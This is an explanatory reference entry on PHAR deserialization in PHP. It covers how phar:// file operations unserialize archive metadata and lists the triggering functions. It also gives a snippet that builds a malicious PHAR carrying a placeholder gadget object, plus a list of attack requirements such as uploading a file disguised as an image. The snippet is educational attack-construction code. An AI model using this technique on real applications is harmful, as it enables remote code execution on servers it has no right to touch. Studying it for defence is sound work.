PHAR Deserialization

PHAR Deserialization is a PHP vulnerability where accessing a PHAR (PHP Archive) file triggers automatic deserialization of its metadata, potentially leading to code execution. This occurs even when using file operation functions not typically associated with deserialization.

How It Works

PHAR files contain serialized metadata in their manifest. When PHP accesses a PHAR file using the phar:// stream wrapper, it automatically deserializes this metadata. If an attacker can upload a PHAR file and trigger file operations on it, they can exploit this to execute gadget chains.

Vulnerable Functions

// Any file operation with phar:// triggers deserialization
file_exists('phar://uploads/malicious.phar');
file_get_contents('phar://uploads/malicious.phar');
filesize('phar://uploads/malicious.phar');
is_file('phar://uploads/malicious.phar');
fopen('phar://uploads/malicious.phar', 'r');
include('phar://uploads/malicious.phar');

// Even image functions!
getimagesize('phar://uploads/malicious.phar');

Creating Malicious PHAR

$phar = new Phar('malicious.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'test');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

// Inject serialized gadget chain as metadata
$object = new VulnerableClass();
$phar->setMetadata($object);
$phar->stopBuffering();

Attack Requirements

• Ability to upload a file (can be disguised as image)
• File operation triggered on uploaded file with phar:// wrapper
• Exploitable gadget chain in application or libraries

See Also

• PHP Object Injection
• Insecure Deserialization
• Gadget Chain